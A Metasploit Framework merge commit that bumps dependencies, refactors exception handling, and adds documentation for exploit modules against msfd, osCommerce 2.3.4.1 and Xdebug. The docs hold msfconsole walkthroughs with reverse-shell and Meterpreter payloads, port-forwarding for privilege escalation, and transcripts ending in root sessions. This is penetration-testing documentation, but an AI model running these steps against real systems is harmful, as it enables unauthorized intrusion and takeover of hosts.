dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Merge branch 'master' into ms-2962

This commit is contained in:
christopher lee 2018-05-02 15:31:57 -05:00
parent a7ec7b52b7 d6cf32fad8
commit 038fe03777
132 changed files with 2642 additions and 2212 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
Gemfile.lock
View File

@ -18,9 +18,9 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 1.3.33)
metasploit-payloads (= 1.3.34)
metasploit_data_models
metasploit_payloads-mettle (= 0.3.7)
metasploit_payloads-mettle (= 0.3.8)
mqtt
msgpack
nessus_rest
@ -121,7 +121,7 @@ GEM
dnsruby (1.60.2)
docile (1.3.0)
erubis (2.7.0)
eventmachine (1.2.5)
eventmachine (1.2.6)
factory_bot (4.8.2)
activesupport (>= 3.0.0)
factory_bot_rails (4.8.2)
@ -161,7 +161,7 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.3.33)
metasploit-payloads (1.3.34)
metasploit_data_models (3.0.0)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -172,7 +172,7 @@ GEM
postgres_ext
railties (~> 4.2.6)
recog (~> 2.0)
metasploit_payloads-mettle (0.3.7)
metasploit_payloads-mettle (0.3.8)
method_source (0.9.0)
mini_portile2 (2.3.0)
minitest (5.11.3)

99
documentation/modules/exploit/multi/browser/msfd_rce_browser.md Normal file
View File

@ -0,0 +1,99 @@
## Description
This module connects to the Metasploit msf daemon and uses the ruby interpreter
to achieve a shell. This module can be used when the vulnerable service is only
listening on localhost and the attacker has not achieved a foothold on the
machine. To achieve code execution, the data is sent from the victim's browser.
To achieve this, the victim must visit the attacker's web site.
## Vulnerable Application
[Metasploit](https://github.com/rapid7/metasploit-framework) has a legacy method
of providing remote access. The msf daemon provides no means of authentication
and is therefore vulnerable against an attacker who has IP access to the daemon.
In those cases where the daemon is listening on localhost, we take advantage of
the fact that the victim's web browser has IP access to the daemon.
Because the msfconsole-program is line-based, it is possible to successfully
send commands through the HTTP-protocol. This module takes advantage of this by
placing the msfconsole-command in the POST-data of a HTTP-request. Since these
POST-requests are considered safe to send cross-domain, it is possible to send
them from the attacker's web application and to localhost using the victim's
browser.
All versions of Metasploit are affected by this module, however testing has only
been performed on the following targets:
* Metasploit 5.0.0 on Ubuntu 16.04 (using Firefox and Chrome)
* Metasploit 4.16.51 on Windows 7 (using IE, exploitation failed in Firefox and
Chrome)
***NB!*** Exploitation on Windows had a higher degree of success, when the
quiet-flag was sent to the msf daemon. On Linux, it made no difference.
Source code and installers:
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
## Verification Steps
1. Start the vulnerable service `msfd -q -f`
2. Start `msfconsole`
3. Do: `use exploit/multi/browser/msfd_rce_browser`
4. Do: `set REMOTE_IP [IP]` (default: `127.0.0.1`)
5. Do: `set RPORT [PORT]` (default: `55554`)
6. Do: `set PAYLOAD [PAYLOAD]`
7. Do: `exploit`
8. Do: Visit the listed URL from the victim's machine
9. You should get a shell
## Options
Options unique for this module is described below.
**REMOTE_IP**
IP to target when running inside the victim's browser.
**REMOTE_PORT**
Remote port the vulnerable service is running at, default is 55554.
## Scenarios
### Through the victim's browser
```
msf5 > use exploit/multi/browser/msfd_rce_browser
msf5 exploit(multi/browser/msfd_rce_browser) > set payload ruby/shell_reverse_tcp
payload => ruby/shell_reverse_tcp
msf5 exploit(multi/browser/msfd_rce_browser) > set lhost 192.168.0.17
lhost => 192.168.0.17
msf5 exploit(multi/browser/msfd_rce_browser) > set lport 443
lport => 443
msf5 exploit(multi/browser/msfd_rce_browser) > exploit
[*] Exploit running as background job 0.
[-] Handler failed to bind to 192.168.0.17:443:- -
[*] Started reverse TCP handler on 0.0.0.0:443
msf5 exploit(multi/browser/msfd_rce_browser) > [*] Using URL:
http://0.0.0.0:8080/J5ras6oYftFWW4
[*] Local IP: http://172.17.0.2:8080/J5ras6oYftFWW4
[*] Server started.
```
Visit the web site listed in a browser on the victim's machine and you should
get the output below.
```
[*] 192.168.0.17 msfd_rce_browser - 192.168.0.17 msfd_rce_browser
Sending HTML...
[*] Command shell session 4 opened (172.17.0.2:443 -> 192.168.0.17:48376) at 2018-04-22 19:15:07 +0000
id
[*] exec: id
uid=0(root) gid=0(root) groups=0(root)
```

38
documentation/modules/exploit/multi/http/oscommerce_installer_unauth_code_exec.md Normal file
View File

@ -0,0 +1,38 @@
## Vulnerable Application
osCommerce version 2.3.4.1 is vulnerable to remote code execution. If the `/install/` directory was not removed, it is possible for an unauthenticated attacker to run the `install_4.php` script, which will create the configuration file for the installation. This allows the attacker to inject PHP code into the configuration file and execute it.
## Verification Steps
1. Download and install [osCommerce 2.3.4.1](https://www.exploit-db.com/apps/ce2796b352d6e0fb4e9f03866ae98541-oscommerce-2.3.4.zip)
2. `use exploit/multi/http/oscommerce_installer_unauth_code_exec`
3. `set RHOST IP`
4. `set PAYLOAD php/meterpreter/reverse_tcp`
5. `set LHOST IP`
6. `exploit`
7. **Verify** a new Meterpreter session is started
## Scenarios
### osCommerce version 2.3.4.1 on Debian
```
msf > use exploit/multi/http/oscommerce_installer_unauth_code_exec
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set RHOST 172.16.40.188
RHOST => 172.16.40.188
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set LHOST 172.16.40.5
LHOST => 172.16.40.5
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > exploit
[*] Started reverse TCP handler on 172.16.40.5:4444
[*] Sending stage (37543 bytes) to 172.16.40.188
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.188:47466) at 2018-04-05 18:14:45 +0100
meterpreter > sysinfo
Computer : oscommerce
OS : Linux oscommerce 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) x86_64
Meterpreter : php/linux
meterpreter >
```

106
documentation/modules/exploit/multi/misc/msfd_rce_remote.md Normal file
View File

@ -0,0 +1,106 @@
## Description
This module connects to the Metasploit msf daemon and uses the ruby interpreter
to achieve a shell. This module can target remote systems if the daemon is
exposed on a remote interface or it can be used for privilege escalation when
the attacker has a foothold. If used as privilege escalation, port forwarding
must be set up.
## Vulnerable Application
[Metasploit](https://github.com/rapid7/metasploit-framework) has a legacy method
of providing remote access. The msf daemon provides no means of authentication
and is therefore vulnerable against an attacker who has IP access to the daemon.
All versions of Metasploit are affected by this module, however testing has only
been performed on the following targets:
* Metasploit 5.0.0 on Ubuntu 16.04
* Metasploit 4.16.51 on Windows 7
Source code and installers:
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
## Verification Steps
1. Start the vulnerable service: `msfd -f -q -a 0.0.0.0`
2. Start `msfconsole`
3. Do: `use exploit/multi/misc/msfd_rce_remote`
4. Do: `set RHOST [IP]`
5. Do: `set RPORT [PORT]` (default: `55554`)
6. Do: `set PAYLOAD [PAYLOAD]`
7. Do: `exploit`
8. You should get a shell
## Options
**RHOST**
Remote Host
**RPORT**
Remote port the vulnerable service is running at, default is 55554.
## Scenarios
### Remote target
```
msf5 > use exploit/multi/misc/msfd_rce_remote
msf5 exploit(multi/misc/msfd_rce_remote) > set rhost 192.168.56.101
rhost => 192.168.56.101
msf5 exploit(multi/misc/msfd_rce_remote) > set payload ruby/shell_reverse_tcp
payload => ruby/shell_reverse_tcp
msf5 exploit(multi/misc/msfd_rce_remote) > set lhost 192.168.0.17
lhost => 192.168.0.17
msf5 exploit(multi/misc/msfd_rce_remote) > set lport 443
lport => 443
msf5 exploit(multi/misc/msfd_rce_remote) > exploit
[-] Handler failed to bind to 192.168.0.17:443:- -
[*] Started reverse TCP handler on 0.0.0.0:443
[*] Command shell session 1 opened (172.17.0.2:443 -> 192.168.0.17:48152) at 2018-04-22 18:43:41 +0000
whoami
robin
```
### Local target - privilege escalation
```
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > shell
Process 17366 created.
Channel 1 created.
netstat -lntup|grep 55554
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 127.0.0.1:55554 0.0.0.0:* LISTEN -
ps aux | grep msfd
root 17303 3.3 13.8 535168 283492 pts/18 Sl+ 20:47 0:08 ruby ./msfd -f -q
^C
Terminate channel 1? [y/N] y
meterpreter > portfwd add -l 55554 -p 55554 -r 127.0.0.1
[*] Local TCP relay created: :55554 <-> 127.0.0.1:55554
meterpreter > background
[*] Backgrounding session 2...
msf5 > use exploit/multi/misc/msfd_rce_remote
msf5 exploit(multi/misc/msfd_rce_remote) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf5 exploit(multi/misc/msfd_rce_remote) > exploit
[-] Handler failed to bind to 192.168.0.17:443:- -
[*] Started reverse TCP handler on 0.0.0.0:443
[*] Command shell session 3 opened (172.17.0.2:443 -> 192.168.0.17:48300) at 2018-04-22 18:55:19 +0000
id
uid=0(root) gid=0(root) groups=0(root)
```

127
documentation/modules/exploit/unix/http/xdebug_unauth_exec.md Normal file
View File

@ -0,0 +1,127 @@
## Vulnerable Application
[Xdebug](https://xdebug.org/docs-dbgp.php) is an actively-maintained PHP debugging tool that supports remote debugging of server-side PHP code
This module exploits an unauthenticated vulnerability that allows for the upload of a PHP file and subsequent execution to provide a Meterpreter session back. The module was tested on XDebug version 2.5.5
The vulnerability was discovered by [Ricter Zheng](https://ricterz.me/posts/Xdebug%3A%20A%20Tiny%20Attack%20Surface) (WARNING: This link is in Chinese. [Google Translate version](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fricterz.me%2Fposts%2FXdebug%3A%20A%20Tiny%20Attack%20Surface))
### Setting up XDebug 2.5.5 on xUbuntu 16.04 x64 Desktop
Start with a LAMP server:
```
sudo apt update && sudo apt install -y tasksel
sudo tasksel install lamp-server
```
Now grab XDebug, specifically the version cited by @MinatoTW:
```
wget https://xdebug.org/files/xdebug-2.5.5.tgz
tar xvzf xdebug-2.5.5.tgz
cd xdebug-2.5.5/
php -i
```
Paste the contents of your `php -i` output into [the XDebug installation wizard](https://xdebug.org/wizard.php), which gave me the following:
```
sudo apt install -y php7.0-dev
phpize && ./configure && make
sudo cp modules/xdebug.so /usr/lib/php/20151012/
```
The final step of the wizard is to configure `php.ini`:
```
sudo -s
cat >> /etc/php/7.0/cli/php.ini <<EOL
zend_extension = /usr/lib/php/20151012/xdebug.so
xdebug.remote_enable = 1
xdebug.remote_handler = dbgp
xdebug.remote_autostart = 0
xdebug.remote_connect_back = 1
xdebug.remote_port = 9000
xdebug.remote_host = 127.0.0.1
xdebug.profiler_enable=0
xdebug.profiler_enable_trigger=1
xdebug.profiler_output_dir="/tmp"`
EOL
exit
```
Now that the PHP CLI environment is configured, repeat the above steps for the Apache2 configuration:
```
sudo -s
cat >> /etc/php/7.0/cli/php.ini <<EOL
zend_extension = /usr/lib/php/20151012/xdebug.so
xdebug.remote_enable = 1
xdebug.remote_handler = dbgp
xdebug.remote_autostart = 0
xdebug.remote_connect_back = 1
xdebug.remote_port = 9000
xdebug.remote_host = 127.0.0.1
xdebug.profiler_enable=0
xdebug.profiler_enable_trigger=1
xdebug.profiler_output_dir="/tmp"`
EOL
exit
```
And restart Apache2 for good measure:
```
sudo service apache2 restart
```
And now test that XDebug is working:
```
php -r 'echo xdebug_time_index();'; echo
```
You should see a fairly small number, in my case `4.6014785766602E-5`, which indicates the number of seconds since the php script started, thus the incredibly small number.
## Verification Steps
- Start `msfconsole`
- `use exploits/unix/http/xdebug_rce`
- `check`
- `set RHOST 192.168.69.2`
- `set LHOST 192.168.69.1`
- `set VERBOSE true` (optional)
- `exploit`
## Scenarios
### XDebug 2.5.5 on Ubuntu 16.04 with Apache2 2.4.18
msf5 exploit(unix/http/xdebug_unauth_exec) > check
[*] 192.168.69.2:80 - Request sent
Date: Fri, 27 Apr 2018 21:00:37 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: XDEBUG_SESSION=WIO6hf4Wez; expires=Fri, 27-Apr-2018 22:00:37 GMT; Max-Age=3600; path=/
Content-Length: 16
Content-Type: text/html; charset=UTF-8
[+] 192.168.69.2:80 - Looks like remote server has xdebug enabled
[*] 192.168.69.2:80 The target service is running, but could not be validated.
msf5 exploit(unix/http/xdebug_unauth_exec) > exploit
[*] Started reverse TCP handler on 192.168.69.1:4444
[*] 192.168.69.2:80 - Waiting for client response.
[*] 192.168.69.2:80 - Receiving response
508<?xml version="1.0" encoding="iso-8859-1"?>
<init xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" fileuri="file:///var/www/html/index.php" language="PHP" xdebug:language_version="7.0.28-0ubuntu0.16.04.1" protocol_version="1.0" appid="28166" idekey="5Gg6S9au8B"><engine version="2.5.5"><![CDATA[Xdebug]]></engine><author><![CDATA[Derick Rethans]]></author><url><![CDATA[http://xdebug.org]]></url><copyright><![CDATA[Copyright (c) 2002-2017 by Derick Rethans]]></copyright></init>
[*] 192.168.69.2:80 - Shell might take upto a minute to respond.Please be patient.
[*] 192.168.69.2:80 - Sending payload of size 2098 bytes
[*] Sending stage (37775 bytes) to 192.168.69.2
[*] Meterpreter session 1 opened (192.168.69.1:4444 -> 192.168.69.2:55506) at 2018-04-27 15:57:58 -0500
[+] 192.168.69.2:80 - Deleted /tmp/OLEaK

4
lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb
View File

@ -4,7 +4,7 @@ module CredentialDataProxy
begin
data_service = self.get_data_service
data_service.create_credential(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem creating credential")
end
end
@ -14,7 +14,7 @@ module CredentialDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.creds(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem retrieving credentials")
end
end

2
lib/metasploit/framework/data_service/proxy/db_export_data_proxy.rb
View File

@ -8,7 +8,7 @@ module DbExportDataProxy
}
add_opts_workspace(opts)
data_service.run_db_export(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem generating DB Export")
end
end

2
lib/metasploit/framework/data_service/proxy/event_data_proxy.rb
View File

@ -5,7 +5,7 @@ module EventDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.report_event(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting event")
end
end

6
lib/metasploit/framework/data_service/proxy/exploit_data_proxy.rb
View File

@ -4,7 +4,7 @@ module ExploitDataProxy
begin
data_service = self.get_data_service
data_service.report_exploit_attempt(host, opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting exploit attempt")
end
end
@ -14,7 +14,7 @@ module ExploitDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.report_exploit_failure(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting exploit failure")
end
end
@ -24,7 +24,7 @@ module ExploitDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.report_exploit_success(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting exploit success")
end
end

10
lib/metasploit/framework/data_service/proxy/host_data_proxy.rb
View File

@ -9,7 +9,7 @@ module HostDataProxy
opts[:address] = addresses
opts[:search_term] = search_term
data_service.hosts(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem retrieving hosts")
end
end
@ -37,7 +37,7 @@ module HostDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.report_host(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting host")
end
end
@ -47,7 +47,7 @@ module HostDataProxy
data_service = self.get_data_service
add_opts_workspace(hosts)
data_service.report_hosts(hosts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting hosts")
end
end
@ -56,7 +56,7 @@ module HostDataProxy
begin
data_service = self.get_data_service
data_service.update_host(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem updating host")
end
end
@ -65,7 +65,7 @@ module HostDataProxy
begin
data_service = self.get_data_service
data_service.delete_host(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem deleting host")
end
end

6
lib/metasploit/framework/data_service/proxy/loot_data_proxy.rb
View File

@ -8,7 +8,7 @@ module LootDataProxy
end
add_opts_workspace(opts)
data_service.report_loot(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting loot")
end
end
@ -24,7 +24,7 @@ module LootDataProxy
data_service = self.get_data_service
add_opts_workspace(opts, wspace)
data_service.loot(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem retrieving loot")
end
end
@ -35,7 +35,7 @@ module LootDataProxy
begin
data_service = self.get_data_service
data_service.update_loot(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem updating loot")
end
end

2
lib/metasploit/framework/data_service/proxy/nmap_data_proxy.rb
View File

@ -5,7 +5,7 @@ module NmapDataProxy
data_service = self.get_data_service
add_opts_workspace(args)
data_service.import_nmap_xml_file(args)
rescue Exception => e
rescue => e
self.log_error(e, "Problem importing Nmap XML file")
end
end

8
lib/metasploit/framework/data_service/proxy/note_data_proxy.rb
View File

@ -5,7 +5,7 @@ module NoteDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.notes(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem retrieving notes")
end
end
@ -20,7 +20,7 @@ module NoteDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.report_note(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting note")
end
end
@ -29,7 +29,7 @@ module NoteDataProxy
begin
data_service = self.get_data_service
data_service.update_note(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem updating note")
end
end
@ -38,7 +38,7 @@ module NoteDataProxy
begin
data_service = self.get_data_service
data_service.delete_note(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem deleting note")
end
end

8
lib/metasploit/framework/data_service/proxy/service_data_proxy.rb
View File

@ -5,7 +5,7 @@ module ServiceDataProxy
data_service = self.get_data_service
add_opts_workspace(opts, wspace)
data_service.services(opts)
rescue Exception => e
rescue => e
self.log_error(e, 'Problem retrieving services')
end
end
@ -19,7 +19,7 @@ module ServiceDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.report_service(opts)
rescue Exception => e
rescue => e
self.log_error(e, 'Problem reporting service')
end
end
@ -28,7 +28,7 @@ module ServiceDataProxy
begin
data_service = self.get_data_service
data_service.update_service(opts)
rescue Exception => e
rescue => e
self.log_error(e, 'Problem updating service')
end
end
@ -37,7 +37,7 @@ module ServiceDataProxy
begin
data_service = self.get_data_service
data_service.delete_service(opts)
rescue Exception => e
rescue => e
self.log_error(e, 'Problem deleting service')
end
end

2
lib/metasploit/framework/data_service/proxy/session_data_proxy.rb
View File

@ -3,7 +3,7 @@ module SessionDataProxy
begin
data_service = self.get_data_service
data_service.report_session(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting session")
end
end

2
lib/metasploit/framework/data_service/proxy/session_event_data_proxy.rb
View File

@ -4,7 +4,7 @@ module SessionEventDataProxy
begin
data_service = self.get_data_service()
data_service.report_session_event(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting session event")
end
end

4
lib/metasploit/framework/data_service/proxy/vuln_attempt_data_proxy.rb
View File

@ -4,7 +4,7 @@ module VulnAttemptDataProxy
begin
data_service = self.get_data_service
data_service.vuln_attempts(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem retrieving vulnerability attempts")
end
end
@ -14,7 +14,7 @@ module VulnAttemptDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.report_vuln_attempt(vuln, opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting vulnerability attempts")
end
end

8
lib/metasploit/framework/data_service/proxy/vuln_data_proxy.rb
View File

@ -6,7 +6,7 @@ module VulnDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.vulns(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem retrieving vulns")
end
end
@ -16,7 +16,7 @@ module VulnDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.report_vuln(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting vuln")
end
end
@ -25,7 +25,7 @@ module VulnDataProxy
begin
data_service = self.get_data_service
data_service.update_vuln(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem updating vuln")
end
end
@ -34,7 +34,7 @@ module VulnDataProxy
begin
data_service = self.get_data_service
data_service.delete_vuln(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem deleting vuln")
end
end

2
lib/metasploit/framework/data_service/proxy/web_data_proxy.rb
View File

@ -3,7 +3,7 @@ module WebDataProxy
begin
data_service = self.get_data_service()
data_service.report_web_site(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting website")
end
end

16
lib/metasploit/framework/data_service/proxy/workspace_data_proxy.rb
View File

@ -5,7 +5,7 @@ module WorkspaceDataProxy
data_service = self.get_data_service
opts = { name: workspace_name }
data_service.workspaces(opts).first
rescue Exception => e
rescue => e
self.log_error(e, "Problem finding workspace")
end
end
@ -15,7 +15,7 @@ module WorkspaceDataProxy
data_service = self.get_data_service
opts = { name: workspace_name }
data_service.add_workspace(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem adding workspace")
end
end
@ -27,7 +27,7 @@ module WorkspaceDataProxy
ws = add_workspace(Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME)
end
ws
rescue Exception => e
rescue => e
self.log_error(e, "Problem finding default workspace")
end
end
@ -42,7 +42,7 @@ module WorkspaceDataProxy
warn "@current_workspace was not set. Setting to default_workspace: #{default_workspace.name}"
@current_workspace = default_workspace
end
rescue Exception => e
rescue => e
self.log_error(e, "Problem retrieving workspace")
end
end
@ -51,7 +51,7 @@ module WorkspaceDataProxy
def workspace=(workspace)
begin
@current_workspace = workspace
rescue Exception => e
rescue => e
self.log_error(e, "Problem setting workspace")
end
end
@ -60,7 +60,7 @@ module WorkspaceDataProxy
begin
data_service = self.get_data_service
data_service.workspaces(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem retrieving workspaces")
end
end
@ -69,7 +69,7 @@ module WorkspaceDataProxy
begin
data_service = self.get_data_service
data_service.delete_workspaces(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem deleting workspaces")
end
end
@ -78,7 +78,7 @@ module WorkspaceDataProxy
begin
data_service = self.get_data_service
data_service.update_workspace(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem updating workspace")
end
end

8
lib/metasploit/framework/data_service/remote/http/response_data_helper.rb
View File

@ -20,7 +20,7 @@ module ResponseDataHelper
return JSON.parse(body).symbolize_keys
end
end
rescue Exception => e
rescue => e
elog "Error parsing response: #{e.message}"
e.backtrace.each { |line| elog line }
end
@ -36,7 +36,7 @@ module ResponseDataHelper
if !body.nil? && !body.empty?
return JSON.parse(body, object_class: OpenStruct)
end
rescue Exception => e
rescue => e
elog "open struct conversion failed #{e.message}"
end
end
@ -64,7 +64,7 @@ module ResponseDataHelper
end
return rv
end
rescue Exception => e
rescue => e
elog "Mdm Object conversion failed #{e.message}"
e.backtrace.each { |line| elog "#{line}\n" }
end
@ -87,7 +87,7 @@ module ResponseDataHelper
unless File.exists?(save_path) && File.read(save_path) == decoded_file
File.open(save_path, 'w+') { |file| file.write(decoded_file) }
end
rescue Exception => e
rescue => e
elog "There was an error writing the file: #{e}"
e.backtrace.each { |line| elog "#{line}\n"}
end

8
lib/metasploit/framework/data_service/stubs/note_data_service.rb
View File

@ -1,19 +1,19 @@
module NoteDataService
def notes(opts)
raise NotImplementedError, 'NoteDataService#notes is not implemented'
raise 'NoteDataService#notes is not implemented'
end
def report_note(opts)
raise NotImplementedError, 'NoteDataService#report_note is not implemented'
raise 'NoteDataService#report_note is not implemented'
end
def update_note(opts)
raise NotImplementedError, 'NoteDataService#update_note is not implemented'
raise 'NoteDataService#update_note is not implemented'
end
def delete_note(opts)
raise NotImplementedError, 'NoteDataService#delete_note is not implemented'
raise 'NoteDataService#delete_note is not implemented'
end
end

2
lib/metasploit/framework/login_scanner/bavision_cameras.rb
View File

@ -5,7 +5,7 @@ module Metasploit
module Framework
module LoginScanner
class BavisionCamerasException < Exception; end
class BavisionCamerasException < StandardError; end
class BavisionCameras < HTTP

3
lib/msf/core/data_store.rb
View File

@ -235,12 +235,13 @@ class DataStore < Hash
# Override merge! so that we merge the aliases and imported hashes
#
def merge!(other)
super
if other.is_a? DataStore
self.aliases.merge!(other.aliases)
self.imported.merge!(other.imported)
self.imported_by.merge!(other.imported_by)
end
# call super last so that we return a reference to ourselves
super
end
#

2
lib/msf/core/db_manager/http/job_processor.rb
View File

@ -20,7 +20,7 @@ class JobProcessor
wrapper = @job_queue.pop()
begin
wrapper.job.call(wrapper.job_args)
rescue Exception => e
rescue => e
print_error "Error executing job #{e.message}", e
end
end

2
lib/msf/core/db_manager/http/servlet/credential_servlet.rb
View File

@ -27,7 +27,7 @@ module CredentialServlet
response << json
end
set_json_response(response)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}

2
lib/msf/core/db_manager/http/servlet/db_export_servlet.rb
View File

@ -24,7 +24,7 @@ module DbExportServlet
response = {}
response[:db_export_file] = encoded_file
set_json_response(response)
rescue Exception => e
rescue => e
set_error_on_response(e)
ensure
# Ensure the temporary file gets cleaned up

8
lib/msf/core/db_manager/http/servlet/host_servlet.rb
View File

@ -32,7 +32,7 @@ module HostServlet
data = get_db.hosts(sanitized_params)
includes = [:loots]
set_json_response(data, includes)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -45,7 +45,7 @@ module HostServlet
data = get_db.report_host(opts)
}
exec_report_job(request, &job)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -59,7 +59,7 @@ module HostServlet
opts[:id] = tmp_params[:id] if tmp_params[:id]
data = get_db.update_host(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -71,7 +71,7 @@ module HostServlet
opts = parse_json_request(request, false)
data = get_db.delete_host(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}

6
lib/msf/core/db_manager/http/servlet/loot_servlet.rb
View File

@ -30,7 +30,7 @@ module LootServlet
loot.data = Base64.urlsafe_encode64(loot.data) if loot.data
end
set_json_response(data, includes)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -60,7 +60,7 @@ module LootServlet
opts[:id] = tmp_params[:id] if tmp_params[:id]
data = get_db.update_loot(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -72,7 +72,7 @@ module LootServlet
opts = parse_json_request(request, false)
data = get_db.delete_loot(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}

8
lib/msf/core/db_manager/http/servlet/note_servlet.rb
View File

@ -27,7 +27,7 @@ module NoteServlet
data = get_db.notes(sanitized_params)
includes = [:host]
set_json_response(data, includes)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -40,7 +40,7 @@ module NoteServlet
get_db.report_note(opts)
}
exec_report_job(request, &job)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -54,7 +54,7 @@ module NoteServlet
opts[:id] = tmp_params[:id] if tmp_params[:id]
data = get_db.update_note(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -66,7 +66,7 @@ module NoteServlet
opts = parse_json_request(request, false)
data = get_db.delete_note(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}

6
lib/msf/core/db_manager/http/servlet/service_servlet.rb
View File

@ -26,7 +26,7 @@ module ServiceServlet
data = get_db.services(opts)
includes = [:host]
set_json_response(data, includes)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -48,7 +48,7 @@ module ServiceServlet
opts[:id] = tmp_params[:id] if tmp_params[:id]
data = get_db.update_service(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -60,7 +60,7 @@ module ServiceServlet
opts = parse_json_request(request, false)
data = get_db.delete_service(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}

2
lib/msf/core/db_manager/http/servlet/session_event_servlet.rb
View File

@ -19,7 +19,7 @@ module SessionEventServlet
opts = parse_json_request(request, false)
data = get_db().session_events(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}

2
lib/msf/core/db_manager/http/servlet/session_servlet.rb
View File

@ -18,7 +18,7 @@ module SessionServlet
#opts = parse_json_request(request, false)
data = get_db().get_all_sessions()
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}

4
lib/msf/core/db_manager/http/servlet/vuln_attempt_servlet.rb
View File

@ -23,7 +23,7 @@ module VulnAttemptServlet
opts = parse_json_request(request, false)
data = get_db.vuln_attempts(params.symbolize_keys)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -39,7 +39,7 @@ module VulnAttemptServlet
get_db.report_vuln_attempt(vuln, opts)
}
exec_report_job(request, &job)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}

8
lib/msf/core/db_manager/http/servlet/vuln_servlet.rb
View File

@ -27,7 +27,7 @@ module VulnServlet
data = get_db.vulns(sanitized_params)
includes = [:host, :vulns_refs, :refs, :module_refs]
